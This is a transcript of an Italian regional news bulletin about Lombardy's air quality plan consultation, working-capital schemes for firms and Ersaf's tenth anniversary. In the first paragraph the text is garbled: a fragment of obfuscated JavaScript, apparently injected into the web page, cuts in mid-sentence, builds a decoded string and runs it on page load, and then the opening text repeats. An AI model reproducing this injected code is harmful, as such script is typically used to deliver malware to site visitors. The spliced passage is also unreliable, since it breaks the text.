Bentrovati a un nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

Dopodomani, lunedì 7 gennaio, sarà l'ultimo giorno utile per presentare proposte di modifica e osservazioni al Piano sulla qualità dell'Aria della Regione Lombardia (Pria). Lo ricorda l'assessore all'Ambiente, Energia e Sistemi Verdi, Leonardo Salvemini che lancia un appello a inviare il proprio contributo tramite il sito www.statigeneralidellaria.it. "C'è ancora qualche giorno di tempo per leggere le 91 misure(e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} not Bentrovati a un nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

Dopodomani, lunedì 7 gennaio, sarà l'ultimo giorno utile per presentare proposte di modifica e osservazioni al Piano sulla qualità dell'Aria della Regione Lombardia (Pria). Lo ricorda l'assessore all'Ambiente, Energia e Sistemi Verdi, Leonardo Salvemini che lancia un appello a inviare il proprio contributo tramite il sito www.statigeneralidellaria.it. "C'è ancora qualche giorno di tempo per leggere le 91 misure che abbiamo proposto - spiega Salvemini - e per inviarci opinioni ed impressioni. Dal sito sono scaricabili tutti i documenti su cui stiamo lavorando. La partecipazione di ciascun lombardo è importante perchè si tratta di misure che impattano sulla vita di tutti, ed in particolar modo mirano a garantire un'aria più pulita e un ambiente più sano". "Si possono inviare commenti complessivi sul Piano – continua l'assessore - o scrivere le proprie idee su una singola misura. Noi siamo aperti a qualsiasi contributo che venga dalla vita quotidiana delle persone; vogliamo che le misure non siano astrattamente calate dall'alto, ma risposte a problemi concreti".


Per rispondere al fabbisogno di capitale circolante delle imprese lombarde, Regione Lombardia ha messo in campo progetti come il Fondo Socio-Sanitario, che ha accentrato i flussi finanziari delle Aziende Sanitarie in Finlombarda come unico soggetto pagatore, e la linea “Credito Adesso” per le micro, piccole e medie imprese. Dopo queste esperienze oggi si ragiona anche sulla possibilità di introdurre una moneta complementare, come stanno sperimentando alcune realtà europee: il Wir svizzero e il Nantò francese, ad esempio. All'auditorium di Palazzo Lombardia perciò è stato organizzato un momento di studio sul tema, aperto dal presidente Roberto Formigoni..

(AUDIO)

L'Ente regionale per i servizi all'agricoltura e alle foreste di Regione Lombardia, Ersaf, festeggia i suoi primi dieci anni di attività. All'assessore all'Agricoltura Giuseppe Elias abbiamo chiesto qual è la sua esperienza in questa struttura...

(AUDIO)

Ed è tutto. Grazie per l’ascolto.